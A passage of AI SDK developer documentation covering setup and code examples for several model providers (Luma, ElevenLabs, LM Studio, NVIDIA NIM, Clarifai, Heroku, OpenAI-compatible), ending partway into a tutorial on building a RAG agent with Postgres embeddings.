          type: 'text',
          text: 'What is this document about?',
        },
        {
          type: 'file',
          data: fs.readFileSync('./data/ai.pdf'),
          mediaType: 'application/pdf',
          filename: 'ai.pdf', // optional
        },
      ],
    },
  ],
});

You can also pass the URL of a PDF:

{
  type: 'file',
  data: new URL('https://example.com/document.pdf'),
  mediaType: 'application/pdf',
  filename: 'document.pdf', // optional
}

The model will have access to the contents of the PDF file and respond to questions about it.

Model Capabilities

Model	Image Input	Object Generation	Tool Usage	Tool Streaming
`sonar-deep-research`
`sonar-reasoning-pro`
`sonar-reasoning`
`sonar-pro`
`sonar`

title: Luma description: Learn how to use Luma AI models with the AI SDK.

Luma Provider

Setup

The Luma provider is available via the @ai-sdk/luma module. You can install it with

Provider Instance

You can import the default provider instance luma from @ai-sdk/luma:

import { luma } from '@ai-sdk/luma';

If you need a customized setup, you can import createLuma and create a provider instance with your settings:

import { createLuma } from '@ai-sdk/luma';

const luma = createLuma({
  apiKey: 'your-api-key', // optional, defaults to LUMA_API_KEY environment variable
  baseURL: 'custom-url', // optional
  headers: {
    /* custom headers */
  }, // optional
});

You can use the following optional settings to customize the Luma provider instance:

baseURL string

Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://api.lumalabs.ai.
apiKey string

API key that is being sent using the Authorization header. It defaults to the LUMA_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Image Models

You can create Luma image models using the .image() factory method. For more on image generation with the AI SDK see generateImage().

Basic Usage

import { luma } from '@ai-sdk/luma';
import { experimental_generateImage as generateImage } from 'ai';
import fs from 'fs';

const { image } = await generateImage({
  model: luma.image('photon-1'),
  prompt: 'A serene mountain landscape at sunset',
  aspectRatio: '16:9',
});

const filename = `image-${Date.now()}.png`;
fs.writeFileSync(filename, image.uint8Array);
console.log(`Image saved to ${filename}`);

Image Model Settings

You can customize the generation behavior with optional settings:

const { image } = await generateImage({
  model: luma.image('photon-1'),
  prompt: 'A serene mountain landscape at sunset',
  aspectRatio: '16:9',
  maxImagesPerCall: 1, // Maximum number of images to generate per API call
  providerOptions: {
    luma: {
      pollIntervalMillis: 5000, // How often to check for completed images (in ms)
      maxPollAttempts: 10, // Maximum number of polling attempts before timeout
    },
  },
});

Since Luma processes images through an asynchronous queue system, these settings allow you to tune the polling behavior:

maxImagesPerCall number

Override the maximum number of images generated per API call. Defaults to 1.
pollIntervalMillis number

Control how frequently the API is checked for completed images while they are being processed. Defaults to 500ms.
maxPollAttempts number

Limit how long to wait for results before timing out, since image generation is queued asynchronously. Defaults to 120 attempts.

Model Capabilities

Luma offers two main models:

Model	Description
`photon-1`	High-quality image generation with superior prompt understanding
`photon-flash-1`	Faster generation optimized for speed while maintaining quality

Both models support the following aspect ratios:

1:1
3:4
4:3
9:16
16:9 (default)
9:21
21:9

For more details about supported aspect ratios, see the Luma Image Generation documentation.

Key features of Luma models include:

Ultra-high quality image generation
10x higher cost efficiency compared to similar models
Superior prompt understanding and adherence
Unique character consistency capabilities from single reference images
Multi-image reference support for precise style matching

Advanced Options

Luma models support several advanced features through the providerOptions.luma parameter.

Image Reference

Use up to 4 reference images to guide your generation. Useful for creating variations or visualizing complex concepts. Adjust the weight (0-1) to control the influence of reference images.

// Example: Generate a salamander with reference
await generateImage({
  model: luma.image('photon-1'),
  prompt: 'A salamander at dusk in a forest pond, in the style of ukiyo-e',
  providerOptions: {
    luma: {
      image_ref: [
        {
          url: 'https://example.com/reference.jpg',
          weight: 0.85,
        },
      ],
    },
  },
});

Style Reference

Apply specific visual styles to your generations using reference images. Control the style influence using the weight parameter.

// Example: Generate with style reference
await generateImage({
  model: luma.image('photon-1'),
  prompt: 'A blue cream Persian cat launching its website on Vercel',
  providerOptions: {
    luma: {
      style_ref: [
        {
          url: 'https://example.com/style.jpg',
          weight: 0.8,
        },
      ],
    },
  },
});

Character Reference

Create consistent and personalized characters using up to 4 reference images of the same subject. More reference images improve character representation.

// Example: Generate character-based image
await generateImage({
  model: luma.image('photon-1'),
  prompt: 'A woman with a cat riding a broomstick in a forest',
  providerOptions: {
    luma: {
      character_ref: {
        identity0: {
          images: ['https://example.com/character.jpg'],
        },
      },
    },
  },
});

Modify Image

Transform existing images using text prompts. Use the weight parameter to control how closely the result matches the input image (higher weight = closer to input but less creative).

// Example: Modify existing image
await generateImage({
  model: luma.image('photon-1'),
  prompt: 'transform the bike to a boat',
  providerOptions: {
    luma: {
      modify_image_ref: {
        url: 'https://example.com/image.jpg',
        weight: 1.0,
      },
    },
  },
});

For more details about Luma's capabilities and features, visit the Luma Image Generation documentation.

title: ElevenLabs description: Learn how to use the ElevenLabs provider for the AI SDK.

ElevenLabs Provider

The ElevenLabs provider contains language model support for the ElevenLabs transcription and speech generation APIs.

Setup

The ElevenLabs provider is available in the @ai-sdk/elevenlabs module. You can install it with

Provider Instance

You can import the default provider instance elevenlabs from @ai-sdk/elevenlabs:

import { elevenlabs } from '@ai-sdk/elevenlabs';

If you need a customized setup, you can import createElevenLabs from @ai-sdk/elevenlabs and create a provider instance with your settings:

import { createElevenLabs } from '@ai-sdk/elevenlabs';

const elevenlabs = createElevenLabs({
  // custom settings, e.g.
  fetch: customFetch,
});

You can use the following optional settings to customize the ElevenLabs provider instance:

apiKey string

API key that is being sent using the Authorization header. It defaults to the ELEVENLABS_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Speech Models

You can create models that call the ElevenLabs speech API using the .speech() factory method.

The first argument is the model id e.g. eleven_multilingual_v2.

const model = elevenlabs.speech('eleven_multilingual_v2');

You can also pass additional provider-specific options using the providerOptions argument. For example, supplying a voice to use for the generated audio.

import { experimental_generateSpeech as generateSpeech } from 'ai';
import { elevenlabs } from '@ai-sdk/elevenlabs';

const result = await generateSpeech({
  model: elevenlabs.speech('eleven_multilingual_v2'),
  text: 'Hello, world!',
  providerOptions: { elevenlabs: {} },
});

language_code string or null
Optional. Language code (ISO 639-1) used to enforce a language for the model. Currently, only Turbo v2.5 and Flash v2.5 support language enforcement. For other models, providing a language code will result in an error.
voice_settings object or null
Optional. Voice settings that override stored settings for the given voice. These are applied only to the current request.
- stability double or null
  Optional. Determines how stable the voice is and the randomness between each generation. Lower values introduce broader emotional range; higher values result in a more monotonous voice.
- use_speaker_boost boolean or null
  Optional. Boosts similarity to the original speaker. Increases computational load and latency.
- similarity_boost double or null
  Optional. Controls how closely the AI should adhere to the original voice.
- style double or null
  Optional. Amplifies the style of the original speaker. May increase latency if set above 0.
pronunciation_dictionary_locators array of objects or null
Optional. A list of pronunciation dictionary locators to apply to the text, in order. Up to 3 locators per request.
Each locator object:
- pronunciation_dictionary_id string (required)
  The ID of the pronunciation dictionary.
- version_id string or null (optional)
  The version ID of the dictionary. If not provided, the latest version is used.
seed integer or null
Optional. If specified, the system will attempt to sample deterministically. Must be between 0 and 4294967295. Determinism is not guaranteed.
previous_text string or null
Optional. The text that came before the current request's text. Can improve continuity when concatenating generations or influence current generation continuity.
next_text string or null
Optional. The text that comes after the current request's text. Can improve continuity when concatenating generations or influence current generation continuity.
previous_request_ids array of strings or null
Optional. List of request IDs for samples generated before this one. Improves continuity when splitting large tasks. Max 3 IDs. If both previous_text and previous_request_ids are sent, previous_text is ignored.
next_request_ids array of strings or null
Optional. List of request IDs for samples generated after this one. Useful for maintaining continuity when regenerating a sample. Max 3 IDs. If both next_text and next_request_ids are sent, next_text is ignored.
apply_text_normalization enum
Optional. Controls text normalization.
Allowed values: 'auto' (default), 'on', 'off'.
- 'auto': System decides whether to apply normalization (e.g., spelling out numbers).
- 'on': Always apply normalization.
- 'off': Never apply normalization.
  For eleven_turbo_v2_5 and eleven_flash_v2_5, can only be enabled with Enterprise plans.
apply_language_text_normalization boolean
Optional. Defaults to false. Controls language text normalization, which helps with proper pronunciation in some supported languages (currently only Japanese). May significantly increase latency.

Model Capabilities

Model	Instructions
`eleven_v3`
`eleven_multilingual_v2`
`eleven_flash_v2_5`
`eleven_flash_v2`
`eleven_turbo_v2_5`
`eleven_turbo_v2`
`eleven_monolingual_v1`
`eleven_multilingual_v1`

Transcription Models

You can create models that call the ElevenLabs transcription API using the .transcription() factory method.

The first argument is the model id e.g. scribe_v1.

const model = elevenlabs.transcription('scribe_v1');

import { experimental_transcribe as transcribe } from 'ai';
import { elevenlabs } from '@ai-sdk/elevenlabs';

const result = await transcribe({
  model: elevenlabs.transcription('scribe_v1'),
  audio: new Uint8Array([1, 2, 3, 4]),
  providerOptions: { elevenlabs: { languageCode: 'en' } },
});

The following provider options are available:

languageCode string

An ISO-639-1 or ISO-639-3 language code corresponding to the language of the audio file. Can sometimes improve transcription performance if known beforehand. Defaults to null, in which case the language is predicted automatically.
tagAudioEvents boolean

Whether to tag audio events like (laughter), (footsteps), etc. in the transcription. Defaults to true.
numSpeakers integer

The maximum amount of speakers talking in the uploaded file. Can help with predicting who speaks when. The maximum amount of speakers that can be predicted is 32. Defaults to null, in which case the amount of speakers is set to the maximum value the model supports.
timestampsGranularity enum

The granularity of the timestamps in the transcription. Defaults to 'word'. Allowed values: 'none', 'word', 'character'.
diarize boolean

Whether to annotate which speaker is currently talking in the uploaded file. Defaults to true.
fileFormat enum

The format of input audio. Defaults to 'other'. Allowed values: 'pcm_s16le_16', 'other'. For 'pcm_s16le_16', the input audio must be 16-bit PCM at a 16kHz sample rate, single channel (mono), and little-endian byte order. Latency will be lower than with passing an encoded waveform.

Model Capabilities

Model	Transcription	Duration	Segments	Language
`scribe_v1`
`scribe_v1_experimental`

title: LM Studio description: Use the LM Studio OpenAI compatible API with the AI SDK.

LM Studio Provider

LM Studio is a user interface for running local models.

It contains an OpenAI compatible API server that you can use with the AI SDK. You can start the local server under the Local Server tab in the LM Studio UI ("Start Server" button).

Setup

The LM Studio provider is available via the @ai-sdk/openai-compatible module as it is compatible with the OpenAI API. You can install it with

Provider Instance

To use LM Studio, you can create a custom provider instance with the createOpenAICompatible function from @ai-sdk/openai-compatible:

import { createOpenAICompatible } from '@ai-sdk/openai-compatible';

const lmstudio = createOpenAICompatible({
  name: 'lmstudio',
  baseURL: 'http://localhost:1234/v1',
});

Language Models

You can interact with local LLMs in LM Studio using a provider instance. The first argument is the model id, e.g. llama-3.2-1b.

const model = lmstudio('llama-3.2-1b');

To be able to use a model, you need to download it first.

Example

You can use LM Studio language models to generate text with the generateText function:

import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { generateText } from 'ai';

const lmstudio = createOpenAICompatible({
  name: 'lmstudio',
  baseURL: 'https://localhost:1234/v1',
});

const { text } = await generateText({
  model: lmstudio('llama-3.2-1b'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
  maxRetries: 1, // immediately error if the server is not running
});

LM Studio language models can also be used with streamText.

Embedding Models

You can create models that call the LM Studio embeddings API using the .textEmbeddingModel() factory method.

const model = lmstudio.textEmbeddingModel(
  'text-embedding-nomic-embed-text-v1.5',
);

Example - Embedding a Single Value

import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { embed } from 'ai';

const lmstudio = createOpenAICompatible({
  name: 'lmstudio',
  baseURL: 'https://localhost:1234/v1',
});

// 'embedding' is a single embedding object (number[])
const { embedding } = await embed({
  model: lmstudio.textEmbeddingModel('text-embedding-nomic-embed-text-v1.5'),
  value: 'sunny day at the beach',
});

Example - Embedding Many Values

When loading data, e.g. when preparing a data store for retrieval-augmented generation (RAG), it is often useful to embed many values at once (batch embedding).

import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { embedMany } from 'ai';

const lmstudio = createOpenAICompatible({
  name: 'lmstudio',
  baseURL: 'https://localhost:1234/v1',
});

// 'embeddings' is an array of embedding objects (number[][]).
// It is sorted in the same order as the input values.
const { embeddings } = await embedMany({
  model: lmstudio.textEmbeddingModel('text-embedding-nomic-embed-text-v1.5'),
  values: [
    'sunny day at the beach',
    'rainy afternoon in the city',
    'snowy night in the mountains',
  ],
});

title: NVIDIA NIM description: Use NVIDIA NIM OpenAI compatible API with the AI SDK.

NVIDIA NIM Provider

NVIDIA NIM provides optimized inference microservices for deploying foundation models. It offers an OpenAI-compatible API that you can use with the AI SDK.

Setup

The NVIDIA NIM provider is available via the @ai-sdk/openai-compatible module as it is compatible with the OpenAI API. You can install it with:

Provider Instance

To use NVIDIA NIM, you can create a custom provider instance with the createOpenAICompatible function from @ai-sdk/openai-compatible:

import { createOpenAICompatible } from '@ai-sdk/openai-compatible';

const nim = createOpenAICompatible({
  name: 'nim',
  baseURL: 'https://integrate.api.nvidia.com/v1',
  headers: {
    Authorization: `Bearer ${process.env.NIM_API_KEY}`,
  },
});

Language Models

You can interact with NIM models using a provider instance. For example, to use DeepSeek-R1, a powerful open-source language model:

const model = nim.chatModel('deepseek-ai/deepseek-r1');

Example - Generate Text

You can use NIM language models to generate text with the generateText function:

import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { generateText } from 'ai';

const nim = createOpenAICompatible({
  name: 'nim',
  baseURL: 'https://integrate.api.nvidia.com/v1',
  headers: {
    Authorization: `Bearer ${process.env.NIM_API_KEY}`,
  },
});

const { text, usage, finishReason } = await generateText({
  model: nim.chatModel('deepseek-ai/deepseek-r1'),
  prompt: 'Tell me the history of the San Francisco Mission-style burrito.',
});

console.log(text);
console.log('Token usage:', usage);
console.log('Finish reason:', finishReason);

Example - Stream Text

NIM language models can also generate text in a streaming fashion with the streamText function:

import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { streamText } from 'ai';

const nim = createOpenAICompatible({
  name: 'nim',
  baseURL: 'https://integrate.api.nvidia.com/v1',
  headers: {
    Authorization: `Bearer ${process.env.NIM_API_KEY}`,
  },
});

const result = streamText({
  model: nim.chatModel('deepseek-ai/deepseek-r1'),
  prompt: 'Tell me the history of the Northern White Rhino.',
});

for await (const textPart of result.textStream) {
  process.stdout.write(textPart);
}

console.log();
console.log('Token usage:', await result.usage);
console.log('Finish reason:', await result.finishReason);

NIM language models can also be used with other AI SDK functions like generateObject and streamObject.

title: Clarifai description: Use Clarifai OpenAI compatible API with the AI SDK.

Clarifai Provider

Clarifai is a platform for building, deploying, and scaling AI-powered applications. It provides a suite of tools and APIs for computer vision, natural language processing, and generative AI. Clarifai offers an OpenAI-compatible API through its full-stack AI development platform, making it easy to integrate powerful AI capabilities using the AI SDK.

Setup

The Clarifai provider is available via the @ai-sdk/openai-compatible module as it is compatible with the OpenAI API. You can install it with:

Provider Instance

To use Clarifai, you can create a custom provider instance with the createOpenAICompatible function from @ai-sdk/openai-compatible:

import { createOpenAICompatible } from '@ai-sdk/openai-compatible';

const clarifai = createOpenAICompatible({
  name: 'clarifai',
  baseURL: 'https://api.clarifai.com/v2/ext/openai/v1',
  apiKey: process.env.CLARIFAI_PAT,
});

New users can sign up for a free account on Clarifai to get started.

Language Models

You can interact with various large language models (LLMs) available on Clarifai using the provider instance. For example, to use DeepSeek-R1, a powerful open-source language model:

const model = clarifai.chatModel(
  'https://clarifai.com/deepseek-ai/deepseek-chat/models/DeepSeek-R1-0528-Qwen3-8B',
);

Example - Generate Text

You can use Clarifai language models to generate text with the generateText function:

import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { generateText } from 'ai';

const clarifai = createOpenAICompatible({
  name: 'clarifai',
  baseURL: 'https://api.clarifai.com/v2/ext/openai/v1',
  apiKey: process.env.CLARIFAI_PAT,
});

const model = clarifai.chatModel(
  'https://clarifai.com/deepseek-ai/deepseek-chat/models/DeepSeek-R1-0528-Qwen3-8B',
);

const { text, usage, finishReason } = await generateText({
  model,
  prompt: 'What is photosynthesis?',
});

console.log(text);
console.log('Token usage:', usage);
console.log('Finish reason:', finishReason);

Example - Streaming Text

You can also stream text responses from Clarifai models using the streamText function:

import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { streamText } from 'ai';

const clarifai = createOpenAICompatible({
  name: 'clarifai',
  baseURL: 'https://api.clarifai.com/v2/ext/openai/v1',
  apiKey: process.env.CLARIFAI_PAT,
});

const model = clarifai.chatModel(
  'https://clarifai.com/deepseek-ai/deepseek-chat/models/DeepSeek-R1-0528-Qwen3-8B',
);

const result = streamText({
  model,
  prompt: 'What is photosynthesis?',
});

for await (const message of result.textStream) {
  console.log(message);
}

For full list of available models, you can refer to the Clarifai Model Gallery.

title: Heroku description: Use a Heroku OpenAI compatible API with the AI SDK.

Heroku Provider

Heroku is a cloud platform that allows you to deploy and run applications, including AI models with OpenAI API compatibility. You can deploy models that are OpenAI API compatible and use them with the AI SDK.

Setup

The Heroku provider is available via the @ai-sdk/openai-compatible module as it is compatible with the OpenAI API. You can install it with

Heroku Setup

Create a test app in Heroku:

heroku create

Inference using claude-3-5-haiku:

heroku ai:models:create -a $APP_NAME claude-3-5-haiku

Export Variables:

export INFERENCE_KEY=$(heroku config:get INFERENCE_KEY -a $APP_NAME)
export INFERENCE_MODEL_ID=$(heroku config:get INFERENCE_MODEL_ID -a $APP_NAME)
export INFERENCE_URL=$(heroku config:get INFERENCE_URL -a $APP_NAME)

Provider Instance

To use Heroku, you can create a custom provider instance with the createOpenAICompatible function from @ai-sdk/openai-compatible:

import { createOpenAICompatible } from '@ai-sdk/openai-compatible';

const heroku = createOpenAICompatible({
  name: 'heroku',
  baseURL: process.env.INFERENCE_URL + '/v1',
  apiKey: process.env.INFERENCE_KEY,
});

Be sure to have your INFERENCE_KEY, INFERENCE_MODEL_ID, and INFERENCE_URL set in your environment variables.

Language Models

You can create Heroku models using a provider instance. The first argument is the served model name, e.g. claude-3-5-haiku.

const model = heroku('claude-3-5-haiku');

Example

You can use Heroku language models to generate text with the generateText function:

import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { generateText } from 'ai';

const heroku = createOpenAICompatible({
  name: 'heroku',
  baseURL: process.env.INFERENCE_URL + '/v1',
  apiKey: process.env.INFERENCE_KEY,
});

const { text } = await generateText({
  model: heroku('claude-3-5-haiku'),
  prompt: 'Tell me about yourself in one sentence',
});

console.log(text);

Heroku language models are also able to generate text in a streaming fashion with the streamText function:

import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { streamText } from 'ai';

const heroku = createOpenAICompatible({
  name: 'heroku',
  baseURL: process.env.INFERENCE_URL + '/v1',
  apiKey: process.env.INFERENCE_KEY,
});

const result = streamText({
  model: heroku('claude-3-5-haiku'),
  prompt: 'Tell me about yourself in one sentence',
});

for await (const message of result.textStream) {
  console.log(message);
}

Heroku language models can also be used in the generateObject, and streamObject functions.

title: OpenAI Compatible Providers description: Use OpenAI compatible providers with the AI SDK.

OpenAI Compatible Providers

You can use the OpenAI Compatible Provider package to use language model providers that implement the OpenAI API.

Below we focus on the general setup and provider instance creation. You can also write a custom provider package leveraging the OpenAI Compatible package.

We provide detailed documentation for the following OpenAI compatible providers:

The general setup and provider instance creation is the same for all of these providers.

Setup

The OpenAI Compatible provider is available via the @ai-sdk/openai-compatible module. You can install it with:

Provider Instance

To use an OpenAI compatible provider, you can create a custom provider instance with the createOpenAICompatible function from @ai-sdk/openai-compatible:

import { createOpenAICompatible } from '@ai-sdk/openai-compatible';

const provider = createOpenAICompatible({
  name: 'provider-name',
  apiKey: process.env.PROVIDER_API_KEY,
  baseURL: 'https://api.provider.com/v1',
  includeUsage: true, // Include usage information in streaming responses
});

You can use the following optional settings to customize the provider instance:

baseURL string

Set the URL prefix for API calls.
apiKey string

API key for authenticating requests. If specified, adds an Authorization header to request headers with the value Bearer <apiKey>. This will be added before any headers potentially specified in the headers option.
headers Record<string,string>

Optional custom headers to include in requests. These will be added to request headers after any headers potentially added by use of the apiKey option.
queryParams Record<string,string>

Optional custom url query parameters to include in request urls.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
includeUsage boolean

Include usage information in streaming responses. When enabled, usage data will be included in the response metadata for streaming requests. Defaults to undefined (false).
supportsStructuredOutputs boolean

Set to true if the provider supports structured outputs. Only relevant for provider(), provider.chatModel(), and provider.languageModel().

Language Models

You can create provider models using a provider instance. The first argument is the model id, e.g. model-id.

const model = provider('model-id');

Example

You can use provider language models to generate text with the generateText function:

import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { generateText } from 'ai';

const provider = createOpenAICompatible({
  name: 'provider-name',
  apiKey: process.env.PROVIDER_API_KEY,
  baseURL: 'https://api.provider.com/v1',
});

const { text } = await generateText({
  model: provider('model-id'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

Including model ids for auto-completion

import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { generateText } from 'ai';

type ExampleChatModelIds =
  | 'meta-llama/Llama-3-70b-chat-hf'
  | 'meta-llama/Meta-Llama-3.1-8B-Instruct-Turbo'
  | (string & {});

type ExampleCompletionModelIds =
  | 'codellama/CodeLlama-34b-Instruct-hf'
  | 'Qwen/Qwen2.5-Coder-32B-Instruct'
  | (string & {});

type ExampleEmbeddingModelIds =
  | 'BAAI/bge-large-en-v1.5'
  | 'bert-base-uncased'
  | (string & {});

const model = createOpenAICompatible<
  ExampleChatModelIds,
  ExampleCompletionModelIds,
  ExampleEmbeddingModelIds
>({
  name: 'example',
  apiKey: process.env.PROVIDER_API_KEY,
  baseURL: 'https://api.example.com/v1',
});

// Subsequent calls to e.g. `model.chatModel` will auto-complete the model id
// from the list of `ExampleChatModelIds` while still allowing free-form
// strings as well.

const { text } = await generateText({
  model: model.chatModel('meta-llama/Llama-3-70b-chat-hf'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

Custom query parameters

Some providers may require custom query parameters. An example is the Azure AI Model Inference API which requires an api-version query parameter.

You can set these via the optional queryParams provider setting. These will be added to all requests made by the provider.

import { createOpenAICompatible } from '@ai-sdk/openai-compatible';

const provider = createOpenAICompatible({
  name: 'provider-name',
  apiKey: process.env.PROVIDER_API_KEY,
  baseURL: 'https://api.provider.com/v1',
  queryParams: {
    'api-version': '1.0.0',
  },
});

For example, with the above configuration, API requests would include the query parameter in the URL like: https://api.provider.com/v1/chat/completions?api-version=1.0.0.

Provider-specific options

The OpenAI Compatible provider supports adding provider-specific options to the request body. These are specified with the providerOptions field in the request body.

For example, if you create a provider instance with the name provider-name, you can add a custom-option field to the request body like this:

const provider = createOpenAICompatible({
  name: 'provider-name',
  apiKey: process.env.PROVIDER_API_KEY,
  baseURL: 'https://api.provider.com/v1',
});

const { text } = await generateText({
  model: provider('model-id'),
  prompt: 'Hello',
  providerOptions: {
    'provider-name': { customOption: 'magic-value' },
  },
});

Custom Metadata Extraction

Working with providers that include non-standard response fields
Experimenting with beta or preview features
Capturing provider-specific metrics or debugging information
Supporting rapid provider API evolution without SDK changes

Metadata extractors work with both streaming and non-streaming chat completions and consist of two main components:

A function to extract metadata from complete responses
A streaming extractor that can accumulate metadata across chunks in a streaming response

Here's an example metadata extractor that captures both standard and custom provider data:

const myMetadataExtractor: MetadataExtractor = {
  // Process complete, non-streaming responses
  extractMetadata: ({ parsedBody }) => {
    // You have access to the complete raw response
    // Extract any fields the provider includes
    return {
      myProvider: {
        standardUsage: parsedBody.usage,
        experimentalFeatures: parsedBody.beta_features,
        customMetrics: {
          processingTime: parsedBody.server_timing?.total_ms,
          modelVersion: parsedBody.model_version,
          // ... any other provider-specific data
        },
      },
    };
  },

  // Process streaming responses
  createStreamExtractor: () => {
    let accumulatedData = {
      timing: [],
      customFields: {},
    };

    return {
      // Process each chunk's raw data
      processChunk: parsedChunk => {
        if (parsedChunk.server_timing) {
          accumulatedData.timing.push(parsedChunk.server_timing);
        }
        if (parsedChunk.custom_data) {
          Object.assign(accumulatedData.customFields, parsedChunk.custom_data);
        }
      },
      // Build final metadata from accumulated data
      buildMetadata: () => ({
        myProvider: {
          streamTiming: accumulatedData.timing,
          customData: accumulatedData.customFields,
        },
      }),
    };
  },
};

You can provide a metadata extractor when creating your provider instance:

const provider = createOpenAICompatible({
  name: 'my-provider',
  apiKey: process.env.PROVIDER_API_KEY,
  baseURL: 'https://api.provider.com/v1',
  metadataExtractor: myMetadataExtractor,
});

The extracted metadata will be included in the response under the providerMetadata field:

const { text, providerMetadata } = await generateText({
  model: provider('model-id'),
  prompt: 'Hello',
});

console.log(providerMetadata.myProvider.customMetric);

This allows you to access provider-specific information while maintaining a consistent interface across different providers.

title: RAG Agent description: Learn how to build a RAG Agent with the AI SDK and Next.js tags: [ 'rag', 'chatbot', 'next', 'embeddings', 'database', 'retrieval', 'memory', 'agent', ]

RAG Agent Guide

In this guide, you will learn how to build a retrieval-augmented generation (RAG) agent.

Before we dive in, let's look at what RAG is, and why we would want to use it.

What is RAG?

RAG stands for retrieval augmented generation. In simple terms, RAG is the process of providing a Large Language Model (LLM) with specific information relevant to the prompt.

Why is RAG important?

To illustrate with a basic example, imagine asking the model for your favorite food:

**input**
What is my favorite food?

**generation**
I don't have access to personal information about individuals, including their
favorite foods.

Not surprisingly, the model doesn’t know. But imagine, alongside your prompt, the model received some extra context:

**input**
Respond to the user's prompt using only the provided context.
user prompt: 'What is my favorite food?'
context: user loves chicken nuggets

**generation**
Your favorite food is chicken nuggets!

Embedding

Chunking

All Together Now

By passing the appropriate context and refining the model’s objective, you are able to fully leverage its strengths as a reasoning machine.

Onto the project!

Project Setup

This project will use the following stack:

Clone Repo

To reduce the scope of this guide, you will be starting with a repository that already has a few things set up for you:

Drizzle ORM (lib/db) including an initial migration and a script to migrate (db:migrate)
a basic schema for the resources table (this will be for source material)
a Server Action for creating a resource

To get started, clone the starter repository with the following command:

First things first, run the following command to install the project’s dependencies:

Create Database

You will need a Postgres database to complete this tutorial. If you don't have Postgres setup on your local machine you can:

Create a free Postgres database with Vercel (recommended - see instructions below); or
Follow this guide to set it up locally

Setting up Postgres with Vercel

To set up a Postgres instance on your Vercel account:

Go to Vercel.com and make sure you're logged in
Navigate to your team homepage
Click on the Integrations tab
Click Browse Marketplace
Look for the Storage option in the sidebar
Select the Neon option (recommended, but any other PostgreSQL database provider should work)
Click Install, then click Install again in the top right corner
On the "Get Started with Neon" page, click Create Database on the right
Select your region (e.g., Washington, D.C., U.S. East)
Turn off Auth
Click Continue
Name your database (you can use the default name or rename it to something like "RagTutorial")
Click Create in the bottom right corner
After seeing "Database created successfully", click Done
You'll be redirected to your database instance
In the Quick Start section, click Show secrets
Copy the full DATABASE_URL environment variable

Migrate Database

Once you have a Postgres database, you need to add the connection string as an environment secret.

Make a copy of the .env.example file and rename it to .env.

Open the new .env file. You should see an item called DATABASE_URL. Copy in your database connection string after the equals sign.

With that set up, you can now run your first database migration. Run the following command:

Vercel AI Gateway Key

Now, open your .env file and add your API Gateway key:

AI_GATEWAY_API_KEY=your-api-key

Replace your-api-key with your actual Vercel AI Gateway API key.

Build

Let’s build a quick task list of what needs to be done:

Create a table in your database to store embeddings
Add logic to chunk and create embeddings when creating resources
Create an agent
Give the agent tools to query / create resources for it’s knowledge base

Create Embeddings Table

Create a new file (lib/db/schema/embeddings.ts) and add the following code:

import { nanoid } from '@/lib/utils';
import { index, pgTable, text, varchar, vector } from 'drizzle-orm/pg-core';
import { resources } from './resources';

export const embeddings = pgTable(
  'embeddings',
  {
    id: varchar('id', { length: 191 })
      .primaryKey()
      .$defaultFn(() => nanoid()),
    resourceId: varchar('resource_id', { length: 191 }).references(
      () => resources.id,
      { onDelete: 'cascade' },
    ),
    content: text('content').notNull(),
    embedding: vector('embedding', { dimensions: 1536 }).notNull(),
  },
  table => ({
    embeddingIndex: index('embeddingIndex').using(
      'hnsw',
      table.embedding.op('vector_cosine_ops'),
    ),
  }),
);

This table has four columns:

id - unique identifier
resourceId - a foreign key relation to the full source material
content - the plain text chunk
embedding - the vector representation of the plain text chunk

To perform similarity search, you also need to include an index (HNSW or IVFFlat) on this column for better performance.

To push this change to the database, run the following command:

Add Embedding Logic

Now that you have a table to store embeddings, it’s time to write the logic to create the embeddings.

Create a file with the following command:

Generate Chunks

const generateChunks = (input: string): string[] => {
  return input
    .trim()
    .split('.')
    .filter(i => i !== '');
};

Install AI SDK

You will use the AI SDK to create embeddings. This will require two more dependencies, which you can install by running the following command:

This will install the AI SDK and the AI SDK's React hooks.

Generate Embeddings

Let’s add a function to generate embeddings. Copy the following code into your lib/ai/embedding.ts file.

import { embedMany } from 'ai';

const embeddingModel = 'openai/text-embedding-ada-002';

const generateChunks = (input: string): string[] => {
  return input
    .trim()
    .split('.')
    .filter(i => i !== '');
};

export const generateEmbeddings = async (
  value: string,
): Promise<Array<{ embedding: number[]; content: string }>> => {
  const chunks = generateChunks(value);
  const { embeddings } = await embedMany({
    model: embeddingModel,
    values: chunks,
  });
  return embeddings.map((e, i) => ({ content: chunks[i], embedding: e }));
};

In this code, you first define the model you want to use for the embeddings. In this example, you are using OpenAI’s text-embedding-ada-002 embedding model.

Update Server Action

Open the file at lib/actions/resources.ts. This file has one function, createResource, which, as the name implies, allows you to create a resource.

'use server';

import {
  NewResourceParams,
  insertResourceSchema,
  resources,
} from '@/lib/db/schema/resources';
import { db } from '../db';

export const createResource = async (input: NewResourceParams) => {
  try {
    const { content } = insertResourceSchema.parse(input);

    const [resource] = await db
      .insert(resources)
      .values({ content })
      .returning();

    return 'Resource successfully created.';
  } catch (e) {
    if (e instanceof Error)
      return e.message.length > 0 ? e.message : 'Error, please try again.';
  }
};

Update the file with the following code:

'use server';

import {
  NewResourceParams,
  insertResourceSchema,
  resources,
} from '@/lib/db/schema/resources';
import { db } from '../db';
